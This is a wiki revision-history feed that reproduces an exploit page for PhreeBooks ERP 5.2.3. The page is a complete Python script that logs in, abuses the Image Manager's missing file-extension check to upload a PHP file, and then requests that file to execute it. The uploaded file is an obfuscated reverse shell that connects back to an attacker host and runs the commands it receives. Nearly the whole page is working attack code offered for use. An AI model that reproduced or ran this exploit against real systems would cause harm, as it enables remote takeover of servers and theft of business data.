https://pwnwiki.com/index.php?action=history&feed=atom&title=PhreeBooks_ERP_5.2.3_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
PhreeBooks ERP 5.2.3 遠程命令執行漏洞 - Revision history
2026-04-17T03:25:37Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=PhreeBooks_ERP_5.2.3_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2022&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution # Date: 2010-04-03 # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://..."
2021-05-02T04:42:52Z
<p>Created page with "==EXP== <pre> # Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution # Date: 2010-04-03 # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution<br />
# Date: 2010-04-03<br />
# Exploit Author: Metin Yunus Kandemir (kandemir)<br />
# Vendor Homepage: https://www.phreesoft.com/<br />
# Software Link: https://sourceforge.net/projects/phreebooks/<br />
# Version: v5.2.3<br />
# Category: Webapps<br />
# Tested on: XAMPP for Linux 5.6.38-0<br />
# Software Description : PhreeBooks 5 is a completely new web based ERP / Accounting <br />
# application that utilizes the redesigned Bizuno ERP library from PhreeSoft<br />
# ==================================================================<br />
# PoC: There are no file extension controls on Image Manager.<br />
# If an authorized user is obtained, it is possible to run a malicious PHP file on the server.<br />
# The following basic python exploit uploads and executes PHP File for you.<br />
<br />
import requests<br />
import sys<br />
import urllib, re, random<br />
<br />
if (len(sys.argv) != 2):<br />
print "[*] Usage: poc.py <RHOST><RPATH> (192.168.1.10/test123)"<br />
exit(0)<br />
<br />
rhost = sys.argv[1]<br />
<br />
# Information Inputs<br />
<br />
UserName = str(raw_input("User Mail: "))<br />
Password = str(raw_input("Password: "))<br />
Aip = str(raw_input("Atacker IP: "))<br />
APort = str(raw_input("Atacker Port: "))<br />
<br />
Ready = str(raw_input("Do you listen to port "+APort+" through the IP address you attacked? Y/N "))<br />
if Ready != "Y":<br />
print "You should listen your port with NetCat or other handlers!"<br />
sys.exit()<br />
<br />
# Login<br />
boundary = "1663866149167960781387708339"<br />
url = "http://"+rhost+"/index.php?&p=bizuno/portal/login"<br />
<br />
headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"}<br />
<br />
ldata="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserID\"\r\n\r\n"+UserName+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserPW\"\r\n\r\n"+Password+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserLang\"\r\n\r\nen_US\r\n-----------------------------"+boundary+"--\r\n"<br />
<br />
r = requests.post(url, headers=headers, data=ldata)<br />
<br />
cookies = r.headers['Set-Cookie']<br />
cookie = re.split(r'\s', cookies)[6].replace(';','').replace('bizunoSession=','').strip()<br />
Ucookie = re.split(r'\s', cookies)[13].replace(';','').replace('bizunoUser=','').strip()<br />
<br />
# Upload<br />
<br />
fname = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3"<br />
exec_url = "http://"+rhost+"/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload"<br />
<br />
exec_cookies = {"bizunoLang": "en_US", "bizunoUser": ""+Ucookie+"", "bizunoSession": ""+cookie+""}<br />
<br />
exec_headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"}<br />
<br />
exec_data="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgSearch\"\r\n\r\n\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgFile\"; filename=\""+fname+"\"\r\nContent-Type: binary/octet-stream\r\n\r\n<?php\n $ipaddr='"+Aip+"';\n $port="+APort+";\n @error_reporting(0);\n @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);\n $dis=@ini_get('disable_functions');\n if(!empty($dis)){\n $dis=preg_replace('/[, ]+/', ',', $dis);\n $dis=explode(',', $dis);\n $dis=array_map('trim', $dis);\n }else{\n $dis=array();\n }\n \n\n if(!function_exists('gsMRl')){\n function gsMRl($c){\n global $dis;\n \n if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {\n $c=$c.\" 2>&1\\n\";\n }\n $oKFwG='is_callable';\n $iodQxhE='in_array';\n \n if($oKFwG('proc_open')and!$iodQxhE('proc_open',$dis)){\n $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);\n $o=NULL;\n while(!feof($pipes[1])){\n $o.=fread($pipes[1],1024);\n }\n @proc_close($handle);\n }else\n if($oKFwG('popen')and!$iodQxhE('popen',$dis)){\n $fp=popen($c,'r');\n $o=NULL;\n if(is_resource($fp)){\n while(!feof($fp)){\n $o.=fread($fp,1024);\n }\n }\n @pclose($fp);\n }else\n if($oKFwG('exec')and!$iodQxhE('exec',$dis)){\n $o=array();\n exec($c,$o);\n $o=join(chr(10),$o).chr(10);\n }else\n if($oKFwG('passthru')and!$iodQxhE('passthru',$dis)){\n ob_start();\n passthru($c);\n $o=ob_get_contents();\n ob_end_clean();\n }else\n if($oKFwG('shell_exec')and!$iodQxhE('shell_exec',$dis)){\n $o=shell_exec($c);\n }else\n if($oKFwG('system')and!$iodQxhE('system',$dis)){\n ob_start();\n system($c);\n $o=ob_get_contents();\n ob_end_clean();\n }else\n {\n $o=0;\n }\n \n return $o;\n }\n }\n $nofuncs='no exec functions';\n if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){\n $s=@fsockopen(\"tcp://192.168.1.11\",$port);\n while($c=fread($s,2048)){\n $out = '';\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n $out=gsMRl(substr($c,0,-1));\n if($out===false){\n fwrite($s,$nofuncs);\n break;\n }\n }\n fwrite($s,$out);\n }\n fclose($s);\n }else{\n $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);\n @socket_connect($s,$ipaddr,$port);\n @socket_write($s,\"socket_create\");\n while($c=@socket_read($s,2048)){\n $out = '';\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n $out=gsMRl(substr($c,0,-1));\n if($out===false){\n @socket_write($s,$nofuncs);\n break;\n }\n }\n @socket_write($s,$out,strlen($out));\n }\n @socket_close($s);\n }\n?>\n\r\n-----------------------------"+boundary+"--\r\n"<br />
<br />
requests.post(exec_url, headers=exec_headers, cookies=exec_cookies, data=exec_data)<br />
<br />
# Exec<br />
<br />
requests.get("http://"+rhost+"/myFiles/images/"+fname+"")<br />
<br />
</pre></div>
Pwnwiki